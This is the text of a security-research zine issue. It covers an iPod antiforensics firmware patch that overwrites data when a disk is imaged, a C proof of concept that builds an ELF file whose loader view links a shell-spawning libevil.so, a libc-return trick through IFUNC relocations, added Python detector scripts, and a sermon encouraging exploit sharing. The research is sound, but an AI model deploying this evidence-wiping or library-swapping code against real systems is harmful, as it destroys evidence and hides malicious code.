Legal Note: Permission to use all or part of this work for personal, classroom, or whatever other use is NOT
granted unless you make a copy and pass it to a neighbor without fee, excepting libations offered by the aforementioned
neighbor in order to facilitate neighborly hacking, and that said copy bears this notice and the full citation on the first
page. Because if burning a book is a sin — which it surely is! — then copying of a book is your sacred duty. For uses in
outer space where a neighbor to share with cannot be readily found, seek blessing from the Pastor and kindly provide
your orbital ephemerides and radio band so that updates could be beamed to you via the Southern Appalachian
Space Agency (SASA).

1 Call to Worship

Neighbors, please join me in reading this first issue of the International Journal of Proof of Concept or Get
the Fuck Out, a friendly little journal for ladies and gentlemen of distinguished ability and taste in the field
of computer security and the architecture of weird machines.

In Section 2, Travis Goodspeed will show you how to build your own antiforensics hard disk out of an
iPod by simple patching of the open source Rockbox firmware. The result is a USB disk, which still plays
music, but which will also self destruct if forensically imaged.

In Section 3, Julian Bangert and Sergey Bratus provide some nifty tricks for abusing the differences in
ELF dialect between exec() and ld.so. As an example, they produce a file that is both a library and an
executable, to the great confusion of reverse engineers and their totally legitimate IDA Pro licenses.

Section 4 is a sermon on the subjects of Bitcoin, Phrack, and the den of iniquity known as the RSA
Conference, inviting all of you to kill some trees in order to save some souls. It brings the joyful news that
we should all shut the fuck up about hat colors and get back to hacking!

Delivering even more nifty ELF research, Bx presents in Section 5 a trick for returning from the ELF
loader into a libc function by abuse of the IFUNC symbol. There's a catch, though, which is that on amd64
her routine seems to pass a very restricted set of arguments. The first parameter must be zero, the second
must be the address of the function being called, and the third argument must be the address of the symbol
being dereferenced. Readers who can extend this into an arbitrary return to libc are urged to do it and share
the trick with others!

Remembering good times, Section 6 by FX tells us of an adventure with Barnaby Jack, one which features
a golden vending machine and some healthy advice to get the fuck out of Abu Dhabi.

Finally, in Section 7, we pass the collection plate and beg that you contribute some PoC of your own.
Articles should be short and sweet, written such that a clever reader will be inspired to build something
nifty.
2 iPod Antiforensics

by Travis Goodspeed

In my lecture introducing Active Disk Antiforensics at 29C3, I presented tricks for emulating a disk with
self defense features using the Facedancer board. This brief article will show you how to build your own
antiforensics disk out of an iPod by patching the Rockbox framework.

To quickly summarize that lecture: (1) USB Mass Storage is just a wrapper for SCSI. We can implement
these protocols and make our own disks. (2) A legitimate host will follow the filesystem and partition data
structure, while a malicious host — that is to say, a forensics investigator's workstation — will read the disk
image from beginning to end. There are other ways to distinguish hosts, but this one is the easiest and has
fewest false positives. (3) By overwriting its contents as it is being imaged, a disk can destroy whatever
evidence or information the forensics investigator wishes to obtain.

There are, of course, exceptions to the above rules. Some high-end imaging software will image a disk
backward from the last sector toward the first. A law-enforcement forensics lab will never mount a volume
before imaging it, but an amateur or a lab less concerned with a clean prosecution might just copy the
protected files out of the volume.

Finally, there is the risk that an antiforensics disk might be identified as such by a forensics investigator.
The disk's security relies upon the forensics technician triggering the erasure, and it won't be sufficient if the
technician knows to work around the defenses. For example, he could revert to the recovery ROM or read
the disk directly.

2.1 Patching Rockbox

Rockbox exposes its hard disk to the host through USB Mass Storage, where handler functions implement
each of the different SCSI commands needed for that protocol. To add antiforensics, it is necessary only to
hook two of those functions: READ(10) and WRITE(10).

In firmware/usbstack/usb_storage.c of the Rockbox source code, blocks are read in two places. The
first of these is in handle_scsi(), near the SCSI_READ_10 case. At the end of this case, you should see a call
to send_and_read_next(), which is the second function that must be patched.

In both of these, it is necessary to add code to both (1) observe incoming requests for illegal traffic and
(2) overwrite sectors as they are requested after the disk has detected tampering. Because of code duplication,
you will find that some data leaks out through send_and_read_next() if you only patch handle_scsi(). (If these
function names mean nothing to you, then you do not have the Rockbox code open, and you won't get much
out of this article, now will you? Open the damn code!)

On an iPod, there will never be any legitimate reads over USB to the firmware partition. For our PoC,
let's trigger self-destruction when that region is read. As this is just a PoC, this patch will provide nonsense
replies to reads instead of destroying the data. Also, the hardcoded values might be specific to the 2048-byte
sector devices, such as the more recent iPod Video hardware.

The following code should be placed in the SCSI_READ_10 case of handle_scsi(). tamperdetected
is a static bool that ought to be declared earlier in usb_storage.c. The same code should go into the
send_and_read_next() function.

//These sectors are for 2048-byte sectors.
//Multiply by 4 for devices with 512-byte sectors.
if (cur_cmd.sector >= 10000 && cur_cmd.sector < 48000)
    tamperdetected = true;

//This is the legitimate read.
cur_cmd.last_result = storage_read_sectors(
    IF_MD2(cur_cmd.lun,) cur_cmd.sector,
    MIN(READ_BUFFER_SIZE/SECTOR_SIZE, cur_cmd.count),
    cur_cmd.data[cur_cmd.data_select]);

//Here, we wipe the buffer to demo antiforensics.
if (tamperdetected) {
    int i; //loop counter; declare it alongside tamperdetected if one is not already in scope
    for (i = 0; i < READ_BUFFER_SIZE; i++)
        cur_cmd.data[cur_cmd.data_select][i] = 0xFF;
    //Clobber the buffer for testing.
    strcpy(cur_cmd.data[cur_cmd.data_select],
           "Never gonna let you down.");

    //Comment the following to make a harmless demo.
    //This writes the buffer back to the disk,
    //eliminating any of the old contents.
    if (cur_cmd.sector >= 48195)
        storage_write_sectors(
            IF_MD2(cur_cmd.lun,)
            cur_cmd.sector,
            MIN(WRITE_BUFFER_SIZE/SECTOR_SIZE, cur_cmd.count),
            cur_cmd.data[cur_cmd.data_select]);
}

2.2 Shut up and play the single!

Neighbors who are too damned lazy to read this article and implement their own patches can grab my
Rockbox patches from https://github.com/travisgoodspeed/.

2.3 Bypassing Antiforensics

This sort of an antiforensics disk can be most easily bypassed by placing the iPod into Disk Mode, which
can be done by a series of key presses. For example, the iPod Video is placed into Disk Mode by holding the
Select and Menu buttons to reboot, then holding Select and Play/Pause to enter Disk Mode. Be sure that
the device is at least partially charged, or it will continue to reboot. Another, surer method, is to remove
the disk from the iPod and read it manually.

Further, this PoC does not erase evidence of its own existence. A full and proper implementation ought
to replace the firmware partition at the beginning of the disk with a clean Rockbox build of the same revision
and also expand later partitions to fill the disk.

2.4 Neighborly Greetings

Kind thanks are due to The Grugq and Int80 for their work on traditional antiforensics of filesystems and
file formats. Thanks are also due to Scott Moulton for discreetly correcting a few of my false assumptions
about real-world forensics.

Thanks are also due to my coauthors on an as-yet-unpublished paper which predates all of my active
antiforensics work but is being held up by the usual academic nonsense.
3 ELFs are dorky, Elves are cool

by Sergey Bratus and Julian Bangert

ELF ABI is beautiful. It's one format to rule all the tools: when a compiler writes a love letter to the
linker about its precious objects, it uses ELF; when the RTLD performs runtime relocation surgery, it goes
by ELF; when the kernel writes an epitaph for an uppity process, it uses ELF. Think of a possible world
where binutils would use their own separate formats, all alike, leaving you to navigate the maze; or think of
how ugly a binary format that's all things to all tools could turn out to be (*cough* ASN.1, X.509 *cough*),
and how hard it'd be to support, say, ASLR on top of it. Yet ELF is beautiful.

Verily, when two parsers see two different structures in the same bunch of bytes, trouble ensues. A
difference in parsing of X.509 certificates nearly broke the internets' SSL trust model[1]. The latest Android
"Master Key" bugs that compromised APK signature verification are due to different interpretation of archive
metadata by Java and C++ parsers/unzippers[2] - yet another security model-breaking parser differential.
Similar issues with parsing other common formats and protocols may yet destroy remaining trust in the open
Internet - but see http://langsec.org/ for how we could start about fixing them.

ELF is beautiful, but with great beauty there comes great responsibility - for its parsers.[3] So do all the
different binutils components as well as the Linux kernel see the same contents in an ELF file? This PoC
shows that's not the case.

There are two major parsers that handle ELF data. One of them is in the Linux kernel's implementation
of execve(2) that creates a new process virtual address space from an ELF file. The other - since the majority
of executables are dynamically linked - is the RTLD (ld.so(8), which on your system may be called something
like /lib64/ld-linux-x86-64.so.2[4]), which loads and links your shared libraries - into the same address space.

It would seem that the kernel's and the RTLD's views of this address space must be the same, that is,
their respective parsers should agree on just what spans of bytes are loaded at which addresses. As luck and
Linux would have it, they do not.

The RTLD is essentially a complex name service for the process namespace that needs a whole lot of
configuration in the ELF file, as complex a tree of C structs as any. By contrast, the kernel side just looks
for a flat table of offsets and lengths of the file's byte segments to load into non-overlapping address ranges.
RTLD's configuration is held by the .dynamic section, which serves as a directory of all the relevant symbol
tables, their related string tables, relocation entries for the symbols, and so on.[5] The kernel merely looks
past the ELF header for the flat table of loadable segments and proceeds to load these into memory.

As a result of this double vision, the kernel's view and the RTLD's view of what belongs in the process
address space can be made starkly different. A libpoc.so would look like a perfectly sane library to RTLD,
calling an innocent "Hello world" function from an innocent libgood.so library. However, when run as an
executable it would expose a different .dynamic table, link in a different library libevil.so, and call a very
different function (in our PoC, dropping shell). It should be noted that ld.so is also an executable and can be
used to launch actual executables lacking executable permissions, a known trick from the Unix antiquity;[6]
however, its construction is different.

The core of this PoC, makepoc.c that crafts the dual-use ELF binary, is a rather nasty C program. It is,
in fact, a "backport-to-C" of our Ruby ELF manipulation tool Mithril[7], inspired by ERESI[8], but intended
for liberally rewriting binaries rather than for ERESI's subtle surgery on the live process space.

[1] See "PKI Layer Cake" http://ioactive.com/pdfs/PKILayerCake.pdf by Dan Kaminsky, Len Sassaman, and Meredith L.
Patterson.

[2] See, e.g., http://www.saurik.com/id/18 and http://www.saurik.com/id/17.

[3] Cf. "The Format and the Parser", a little-known variant of "The Beauty and the Beast". They resolved their parser
differentials and lived vulnlessly ever after.

[4] Just objcopy -O binary -j .interp /bin/ls /dev/stdout, wasn't that easy? :)

[5] To achieve RTLD enlightenment, meditate on the grugq's http://grugq.github.io/docs/subversiveld.pdf and mayhem's
http://s.eresi-project.org/inc/articles/elf-rtld.txt, for surely these are the incarnations of the ABI Buddhas of our
age, and none has described the runtime dynamic linking internals better since.

[6] /lib/ld-linux.so <wouldbe-execfile>

[7] https://github.com/jbangert/mithril

[8] http://www.eresi-project.org/
/* makepoc.c */

/*
I met a professor of arcane degree
Who said: Two vast and handwritten parsers
Live in the wild. Near them, in the dark
Half sunk, a shattering exploit lies, whose frown,
And wrinkled lip, and sneer of cold command,
Tell that its sculptor well those papers read
Which yet survive, stamped on these lifeless things
The hand that mocked them and the student that fed
And on the terminal these words appear:
"My name is Turing, wrecker of proofs:
Parse this unambiguously, ye machine, and, despair!"
Nothing besides is possible. Round the decay
Of that colossal wreck, boundless and bare
The lone and level root shells fork away.
        -- Inspired by Edward Shelley
*/

#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#define PAGESIZE 4096

size_t filesz;
char file[3 * PAGESIZE];  //This is the enormous buffer holding the ELF file.
                          //For neighbours running this on an Electronica BK,
                          //the size might have to be reduced.
Elf64_Phdr *find_dynamic(Elf64_Phdr *phdr);
uint64_t find_dynstr(Elf64_Phdr *phdr);

/* New memory layout (the original listing carried this as an ASCII diagram):

   File offsets                               Memory mapped to
   0k-4k   ELF header, first page             0k-4k  first page
           (orig. code, real .dynamic)
   4k-8k   kernel-phdrs                       not mapped; the ld.so/kernel boundary assumes
                                              the offset that applies on disk works also in
                                              memory; however, if phdrs are in a different
                                              segment, this won't hold.
   8k-12k  ldso-phdrs, fake .dynamic          4k-8k  second page
           w/ new dynstr

   Somewhere far below, there is the .data segment (which we ignore)
*/

int elf_magic() {
    Elf64_Ehdr *ehdr = (Elf64_Ehdr *)file;
    Elf64_Phdr *orig_phdrs = (Elf64_Phdr *)(file + ehdr->e_phoff);
    Elf64_Phdr *firstload, *phdr;
    int i = 0;

    //For the sake of brevity, we assume a lot about the layout of the program:
    assert(filesz > PAGESIZE);      //First 4K has the mapped parts of program
    assert(filesz < 2 * PAGESIZE);  //2nd 4k holds the program headers for the kernel
                                    //3rd 4k holds the program headers for ld.so +
                                    // the new dynamic section and is mapped just above the program
    for (firstload = orig_phdrs; firstload->p_type != PT_LOAD; firstload++);
    assert(0 == firstload->p_offset);
    assert(PAGESIZE > firstload->p_memsz);  //2nd page of memory will hold 2nd segment
    uint64_t base_addr = (firstload->p_vaddr & ~0xffful);

    //PHDRS as read by the kernel's execve() or dlopen(), but NOT seen by ld.so
    Elf64_Phdr *kernel_phdrs = (Elf64_Phdr *)(file + filesz);
    memcpy(kernel_phdrs, orig_phdrs, ehdr->e_phnum * sizeof(Elf64_Phdr));  //copy PHDRs
    ehdr->e_phoff = (char *)kernel_phdrs - file;  //Point ELF header to new PHDRs
    ehdr->e_phnum++;

    //Add a new segment (PT_LOAD), see above diagram
    Elf64_Phdr *new_load = kernel_phdrs + ehdr->e_phnum - 1;
    new_load->p_type = PT_LOAD;
    new_load->p_vaddr = base_addr + PAGESIZE;
    new_load->p_paddr = new_load->p_vaddr;
    new_load->p_offset = 2 * PAGESIZE;
    new_load->p_filesz = PAGESIZE;
    new_load->p_memsz = new_load->p_filesz;
    new_load->p_flags = PF_R | PF_W;

    //Disable large pages or ld.so complains when loading as a .so
    for (i = 0; i < ehdr->e_phnum; i++) {
        if (kernel_phdrs[i].p_type == PT_LOAD)
            kernel_phdrs[i].p_align = PAGESIZE;
    }

    //Setup the PHDR table to be seen by ld.so, not kernel's execve()
    Elf64_Phdr *ldso_phdrs = (Elf64_Phdr *)(file + ehdr->e_phoff
        - PAGESIZE        //First 4k of program address space is mapped in old segment
        + 2 * PAGESIZE);  //Offset of new segment
    memcpy(ldso_phdrs, kernel_phdrs, ehdr->e_phnum * sizeof(Elf64_Phdr));
    //ld.so 2.17 determines load bias (ASLR) of main binary by looking at PT_PHDR
    for (phdr = ldso_phdrs; phdr->p_type != PT_PHDR; phdr++);
    phdr->p_paddr = base_addr + ehdr->e_phoff;  //ld.so expects PHDRS at this vaddr
    //This isn't used to find the PHDR table, but by ld.so to compute ASLR slide
    // (main_map->l_addr) as (actual PHDR address)-(PHDR address in PHDR table)
    phdr->p_vaddr = phdr->p_paddr;

    //Make a new .dynamic table at the end of the second segment,
    // to load libevil instead of libgood
    unsigned dynsz = find_dynamic(orig_phdrs)->p_memsz;
    Elf64_Dyn *old_dyn = (Elf64_Dyn *)(file + find_dynamic(orig_phdrs)->p_offset);
    Elf64_Dyn *ldso_dyn = (Elf64_Dyn *)((char *)ldso_phdrs + ehdr->e_phnum * sizeof(Elf64_Phdr));
    memcpy(ldso_dyn, old_dyn, dynsz);

    //Modify address of dynamic table in ldso_phdrs (which is only used in exec())
    find_dynamic(ldso_phdrs)->p_vaddr = base_addr + ((char *)ldso_dyn - file) - PAGESIZE;

    //We need a new dynstr entry. Luckily ld.so doesn't do range checks on strtab
    // offsets, so we just stick it at the end of the file
    char *ldso_needed_str = (char *)ldso_dyn + ehdr->e_phnum * sizeof(Elf64_Phdr) + dynsz;
    strcpy(ldso_needed_str, "libevil.so");

    assert(ldso_dyn->d_tag == DT_NEEDED);  //replace 1st dynamic entry, DT_NEEDED
    ldso_dyn->d_un.d_ptr = base_addr + (ldso_needed_str - file) - PAGESIZE - find_dynstr(orig_phdrs);
    return 0;
}

void readfile() {
    FILE *f = fopen("target.handchecked", "r");
    //provided binary because the PoC might not like the output of your compiler
    assert(f);
    filesz = fread(file, 1, sizeof file, f);  //Read the entire file
    fclose(f);
}

void writefile() {
    FILE *f = fopen("libpoc.so", "w");
    fwrite(file, sizeof file, 1, f);
    fclose(f);
    system("chmod +x libpoc.so");
}

Elf64_Phdr *find_dynamic(Elf64_Phdr *phdr) {
    //Find the PT_DYNAMIC program header
    for (; phdr->p_type != PT_DYNAMIC; phdr++);
    return phdr;
}

uint64_t find_dynstr(Elf64_Phdr *phdr) {
    //Find the address of the dynamic string table
    phdr = find_dynamic(phdr);
    Elf64_Dyn *dyn;
    for (dyn = (Elf64_Dyn *)(file + phdr->p_offset); dyn->d_tag != DT_STRTAB; dyn++);
    return dyn->d_un.d_ptr;
}

int main()
{
    readfile();
    elf_magic();
    writefile();
    return 0;
}

# Makefile

%.so: %.c
	gcc -fpic -shared -Wl,-soname,$@ -o $@ $^
all: libgood.so libevil.so makepoc target libpoc.so all_is_well

libpoc.so: target.handchecked makepoc
	./makepoc

clean:
	rm -f *.so *.o target makepoc all_is_well

target: target.c libgood.so libevil.so
	echo "#define INTERP \"`objcopy -O binary -j .interp /bin/ls /dev/stdout`\"" > interp.inc && gcc -o target \
	  -Os -Wl,-rpath,. -Wl,-efoo -L. -shared -fPIC -lgood target.c \
	  && strip -K foo $@ && echo 'copy target to target.handchecked by hand!'

target.handchecked: target
	cp $< $@; echo "Beware, you compiled target yourself. \
	  YMMV with your compiler, this is just a friendly poc"

all_is_well: all_is_well.c libpoc.so
	gcc -o $@ -Wl,-rpath,. -lpoc -L. $<
makepoc: makepoc.c
	gcc -ggdb -o $@ $<

/* target.c */

#include <stdio.h>
#include <stdlib.h>
#include "interp.inc"

const char my_interp[] __attribute__((section(".interp"))) = INTERP;
extern int func();
int foo() {
    // printf("Calling func\n");
    func();
    exit(1);  //Needed, because there is no crt.o
}

/* libgood.c */

#include <stdio.h>

int func() { printf("Hello World\n"); return 0; }

/* libevil.c */

#include <stdio.h>
#include <stdlib.h>
int func() { system("/bin/sh"); return 0; }

/* all_is_well.c */

extern int foo();

int main(int argc, char **argv)
{
    foo();
    return 0;
}
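The differential that makepoc.c builds can also be checked for, which is what an added example (mine, not part of the original article or of makepoc.c) does below: the script reads the program header table where execve() does (e_phoff), computes the AT_PHDR address the kernel hands to ld.so as load base + e_phoff, and maps that address back through the PT_LOAD segments to see whether it lands on the same file bytes. The two images are constructed inline, one with an ordinary layout and one laid out like libpoc.so; all function and constant names are my own.

```python
import struct

PT_LOAD, PT_PHDR = 1, 6
EHDR_FMT = "<16sHHIQQQIHHHHHH"            # Elf64_Ehdr, little-endian
PHDR_FMT = "<IIQQQQQQ"                    # Elf64_Phdr
EHDR_SIZE, PHDR_SIZE = struct.calcsize(EHDR_FMT), struct.calcsize(PHDR_FMT)
PHDR_FIELDS = ("type", "flags", "offset", "vaddr", "paddr", "filesz", "memsz", "align")


def parse(data):
    """Read the header table the way execve() does: straight from e_phoff in the ELF header."""
    fields = struct.unpack_from(EHDR_FMT, data, 0)
    ident, e_phoff, e_phentsize, e_phnum = fields[0], fields[5], fields[9], fields[10]
    if ident[:4] != b"\x7fELF" or ident[4] != 2:
        raise ValueError("not an ELF64 image")
    phdrs = [dict(zip(PHDR_FIELDS, struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)))
             for i in range(e_phnum)]
    return e_phoff, phdrs


def vaddr_to_file_offset(phdrs, vaddr):
    """Which file bytes back a virtual address once the PT_LOAD segments are mapped (None if none do)."""
    for p in phdrs:
        if p["type"] == PT_LOAD and p["vaddr"] <= vaddr < p["vaddr"] + p["filesz"]:
            return p["offset"] + (vaddr - p["vaddr"])
    return None


def rtld_phdr_file_offset(data):
    """File offset of the table ld.so will parse.  The kernel passes AT_PHDR = load_base + e_phoff,
    assuming the on-disk offset still holds in memory; that is the boundary assumption makepoc.c relies on."""
    e_phoff, phdrs = parse(data)
    first_load = next(p for p in phdrs if p["type"] == PT_LOAD)
    load_base = first_load["vaddr"] - first_load["offset"]
    return vaddr_to_file_offset(phdrs, load_base + e_phoff)


def phdr_views_agree(data):
    """True when execve() and ld.so end up parsing the same file bytes as the program header table."""
    e_phoff, _ = parse(data)
    return rtld_phdr_file_offset(data) == e_phoff


def phdr(p_type, offset, vaddr, filesz, flags=5):
    return (p_type, flags, offset, vaddr, vaddr, filesz, filesz, 0x1000)


def build_elf(phdrs, e_phoff, size):
    """Constructed sample: a minimal ELF64 (x86-64) image with the given headers written at e_phoff."""
    buf = bytearray(size)
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)       # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    struct.pack_into(EHDR_FMT, buf, 0, ident, 2, 62, 1, 0x400000, e_phoff, 0, 0,
                     EHDR_SIZE, PHDR_SIZE, len(phdrs), 0, 0, 0)
    for i, p in enumerate(phdrs):
        struct.pack_into(PHDR_FMT, buf, e_phoff + i * PHDR_SIZE, *p)
    return bytes(buf)


# Ordinary layout: the table sits at offset 64 inside the first PT_LOAD, so AT_PHDR = 0x400040
# maps back to file offset 64 and both parsers read the same bytes.
SANE = build_elf([phdr(PT_PHDR, 64, 0x400040, 2 * PHDR_SIZE),
                  phdr(PT_LOAD, 0, 0x400000, 0x1000)], e_phoff=64, size=0x1000)

# libpoc.so-style layout: e_phoff (0x1100) points past the first PT_LOAD's file bytes, and a second
# PT_LOAD maps file offset 0x2000 at 0x401000.  AT_PHDR = 0x401100 is backed by file offset 0x2100,
# so ld.so parses a different table than the one execve() used.
DUAL = build_elf([phdr(PT_LOAD, 0, 0x400000, 0x1000),
                  phdr(PT_LOAD, 0x2000, 0x401000, 0x1000, flags=6)], e_phoff=0x1100, size=0x3000)

if __name__ == "__main__":
    for name, image in (("sane", SANE), ("dual-view", DUAL)):
        print(name, "kernel table @", hex(parse(image)[0]),
              "ld.so table @", hex(rtld_phdr_file_offset(image)),
              "agree" if phdr_views_agree(image) else "DIFFERENTIAL")
```

Point the same three functions at a real binary read from disk to lint it the same way; a None from rtld_phdr_file_offset() means AT_PHDR would land in memory that no file bytes back at all.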

3.1 Neighborly Greetings and \cite{}s:

Our gratitude goes to Silvio Cesare, the grugq, klog, mayhem, and Nergal, whose brilliant articles in Phrack
and elsewhere taught us about the ELF format, runtime, and ABI. Special thanks go to the ERESI team, who
set a high standard of ELF (re)engineering to follow. Skape's article Uninformed 6:3 led us to re-examine
ELF in the light of weird machines, and we thank Bx for showing how to build those to full generality.
Last but not least, our view was profoundly shaped by Len Sassaman and Meredith L. Patterson's amazing
insights on parser differentials and their work with Dan Kaminsky to explore them for X.509 and other
Internet protocols and formats.
4 The Pastor Manul Laphroaig's First Epistle to Hacker Preachers
of All Hats, in the sincerest hope that we might shut up about
hats, and get back to hacking.

First, I must caution you to cut out the Sun Tsu quotes. While every good speaker indulges in quoting from
good books of fiction or philosophy, verily I warn you that this can lead to unrighteousness! For when we
tell beginners to study ancient philosophy instead of engineering, they will become experts in the Art of War
and not in the Art of Assembly Language! They find themselves reading Wikiquote instead of Phrack, and
we are all the poorer for it!

I beg you: Rather than beginning your sermons with a quote from Sun Tzu, begin them with nifty little
tricks which the laity can investigate later. For example, did you know that 'strings -n 20 ~/.bitcoin/blk0001.dat'
dumps ASCII art portraits of both Saint Sassaman and Ben Bernanke? This art was encoded as fake public
keys used in real transactions, and it can't be removed without undoing all Bitcoin transactions since it was
inserted into the chain. The entire Bitcoin economy depends upon the face of the chairman of the Fed not
being removed from its ledger! Isn't that clever?

Speaking of cleverness, show respect for it by citing your scripture in chapter and verse. Phrack 49:14
tells us of Aleph1's heroic struggle to explain the way the stack really works, and Uninformed 6:2 is the
harrowing tale of Johnny Cache, H D Moore, and Skape exploiting the Windows kernel's Wifi drivers with
beacon frames and probe responses. These papers are memories to be cherished, and they are stories worth
telling. So tell them! Preach the good word of how the hell things actually work at every opportunity!

Don't just preach the gospel, give the good word on paper. Print a dozen copies of a nifty paper and
give them away at the next con. Do this at Recon, and you will make fascinating friends who will show you
things you never knew, no matter how well you knew them before. Do this at RSA - without trying to sell
anything - and you'll be a veritable hero of enlightenment in an expo center of half-assed sales pitches and
booth babes. Kill some trees to save some souls!

Don't just give papers that others have written. Give early drafts of your own papers, or better still your
own documented 0day. Nothing demonstrates neighborliness like the gift of a good exploit.

Further, I must warn you to ignore this Black Hat / White Hat nonsense. As a Straw Hat, I tell you
that it is not the color of the hat that counts; rather, it is the weave. We know damned well that patching a
million bugs won't keep the bad guys out, just as we know that the vendor who covers up a bug caused by his
own incompetence is hardly a good guy. We see righteousness in cleverness, and we study exploits because
they are so damnably clever! It is a heroic act to build a debugger or a disassembler, and the knowledge of
how to do so ought to be spread far and wide.

First, consider the White Hats. Black Hats are quick to judge these poor fellows as do-gooders who
kill bugs. They ask, "Who would want to kill such a lovely bug, one which gives us such clever exploits?"
Verily I tell you that death is a necessary part of the ecosystem. Without neighbors squashing old bugs,
what incentive would there be to find more clever bugs or to write more clever exploits? Truly I say to the
Black Hats, you have recouped every dollar you've lost on bugfixes by the selective pressure that makes your
exploits valuable enough to sustain a market!

Next, consider the Black Hats. White Hat neighbors are still quicker to judge these poor fellows, not so
much for selling their exploits as for hoarding their knowledge. A neighbor once told me, "Look at these
sinners! They hide their knowledge like a candle beneath a basket, such that none can learn from it." But
don't be so quick to judge! While it's true that the Black Hats publish more slowly, do not mistake this
for not publishing. For does not a candle, when hidden beneath a basket, soon set the basket alight and
burn ten times as bright? And is not self-replicating malware just a self-replicating whitepaper, written in
machine language for the edification of those who read it? Verily I tell you, even the Black Hats have a
neighborliness to them.

So please, shut up about hats and get back to the code.

— M. Laphroaig

Postscript: This little light of mine, I'm gonna let it shine!
5 Returning from ELF to Libc

by Rebecca "Bx" Shapiro

Dear friends,

As you may or may not know, demons lurk within ELF metadata. If you have not yet been introduced
to these creatures, please put this paper down and take a look at either our talk given at 29C3[9], or our
soon-to-be released WOOT publication (in August 2013).

Although the ability to treat the loader as a Turing-complete machine is Pretty_Neat, we realize that
there are a lot of useful computation vectors built right into the libraries that are mapped into the loader
and executable's address space. Instead of re-inventing the wheel, in this POC sermon we'd like to begin
exploring how to harness the power given to us by the perhaps almighty libc.

The System V amd64 ABI scripture[10] in combination with the eglibc-2.17 writings have provided us ELF
demon-tamers with the mighty useful IFUNC symbol. Any symbol of type IFUNC is treated as an indirect
function - the symbol's value is treated as a function, which takes no arguments, and whose return value is
the patch.

The question we will explore from here on is: Can we harness the power of the IFUNC to invoke a piece
of libc?

After vaguely thinking about this problem for a couple of months, we have finally made progress towards
the answer.

Consider the exit() library call. Although one may question why we would want to craft metadata that
causes an exit() to be invoked, we will do so anyway, because it is one of the simplest calls we can make,
because the single argument it takes is not particularly important, and success is immediately obvious.

To invoke exit(), we must lookup the following information when we are compiling the crafted metadata
into some host executable. This is accomplished in three steps, as we explain in our prior work.

1. The location of exit() in the libc binary.

2. The location of the host executable's dynamic symbol table.

3. The location of the host executable's dynamic relocation table.

To invoke exit(), we must accomplish the following during runtime:

1. Lookup the base address of libc.

2. Use this base address to calculate the location of exit() in memory.

3. Store the address of exit() in a dynamic IFUNC symbol.

4. Cause the symbol to be resolved.

. . . and then there was exit()!

Our prior work has demonstrated how to accomplish the first two tasks. Once the first two tasks have
been completed at runtime, we find ourselves with a normal symbol (which we will call symbol 0) whose
value is the location of exit(). At this point we have two ways to proceed: we can

(1) have a second dynamic symbol (named symbol 1) of type IFUNC and have a relocation entry of type
R_X86_64_64 which refers to symbol 0 and whose offset is set to the location of symbol 1's value, causing
the location of exit() to be copied into symbol 1,

-or-

(2) update the type of the symbol that already has the address of exit() so that it becomes an IFUNC.
This can be done in a single relocation entry of type R_X86_64_64, whose addend is that which is copied to the
first 8 bytes of symbol 0. If we set the addend to 0x0100000a00000000, we will find that the symbol type
will become 0x0a (IFUNC), the symbol shndx will be set as 01 so the IFUNC is treated as defined, and the
other fields in the symbol structure will remain the same.

[9] https://www.youtube.com/watch?v=dnLYoMIBhpo

[10] http://www.uclibc.org/docs/psABI-x86_64.pdf

After our metadata that sets up the IFUNC, we need a relocation entry of type R_X86_64_64 that
references our IFUNC symbol, which will cause exit() to be invoked.
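The 8-byte overlay of option (2), worked through as an added example that is not from the original article: a Python script packs a constructed dynamic symbol table, applies one R_X86_64_64 relocation with S = 0 (the null symbol) and the addend 0x0100000a00000000 to the first 8 bytes of the symbol holding exit()'s address, and decodes what comes out. The function names, the sample address and the table layout are mine; note that the two bytes 00 01 the text reads as shndx "01" are the little-endian halfword 0x0100, which is what makes the symbol count as defined.

```python
import struct

SYM_FMT = "<IBBHQQ"                  # Elf64_Sym: st_name, st_info, st_other, st_shndx, st_value, st_size
SYM_SIZE = struct.calcsize(SYM_FMT)  # 24
STT_OBJECT, STT_GNU_IFUNC = 1, 10
STB_GLOBAL = 1
SHN_UNDEF = 0
IFUNC_ADDEND = 0x0100000a00000000    # the addend given in the text


def decode_sym(table, index):
    """Unpack one Elf64_Sym into its fields, with st_info split into binding and type."""
    name, info, other, shndx, value, size = struct.unpack_from(SYM_FMT, table, index * SYM_SIZE)
    return {"name": name, "bind": info >> 4, "type": info & 0xF, "other": other,
            "shndx": shndx, "value": value, "size": size}


def apply_r_x86_64_64(image, r_offset, sym_value, addend):
    """R_X86_64_64: store S + A as one little-endian 64-bit word at r_offset."""
    word = (sym_value + addend) & 0xFFFFFFFFFFFFFFFF
    image[r_offset:r_offset + 8] = struct.pack("<Q", word)


def promote_to_ifunc(dynsym, index):
    """Option (2) from the text: a single R_X86_64_64 whose r_offset is the first byte of the symbol at
    `index` and whose referenced symbol is the null symbol (S = 0), so the word written is exactly the
    addend.  st_value and st_size lie beyond the 8 bytes and are untouched.  Returns the rewritten symbol."""
    apply_r_x86_64_64(dynsym, index * SYM_SIZE, 0, IFUNC_ADDEND)
    return decode_sym(dynsym, index)


def build_dynsym(exit_addr):
    """Constructed sample table: the mandatory null symbol, then the text's "symbol 0", which the
    earlier metadata has already filled with the runtime address of exit()."""
    table = bytearray(struct.pack(SYM_FMT, 0, 0, 0, SHN_UNDEF, 0, 0))
    table += struct.pack(SYM_FMT, 1, (STB_GLOBAL << 4) | STT_OBJECT, 0, SHN_UNDEF, exit_addr, 8)
    return table


def addend_layout(addend):
    """How the addend's 8 bytes land on the symbol's leading fields once written little-endian."""
    name, info, other, shndx = struct.unpack("<IBBH", struct.pack("<Q", addend))
    return {"st_name": name, "st_info": info, "st_other": other, "st_shndx": shndx}


if __name__ == "__main__":
    dynsym = build_dynsym(0x7f3c2b1a0a40)   # constructed address, not a real libc offset
    print("before:", decode_sym(dynsym, 1))
    print("after: ", promote_to_ifunc(dynsym, 1))   # type 10 = STT_GNU_IFUNC, shndx 0x0100 != SHN_UNDEF
    print("addend overlay:", addend_layout(IFUNC_ADDEND))
```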

At this moment, you may be wondering how it may be possible to do more interesting things such as have
control of the argument passed to the function call. It turns out that this problem is still being researched.
In eglibc-2.17, at the time the IFUNC is called, the first argument is and will always be 0, the second
argument is the address of the function being called, and the third argument the address of the symbol
being referenced. Therefore at this level exit(0) is always called. It will clearly take some clever redirection
magic to be able to have control over the function's arguments purely from ELF metadata.

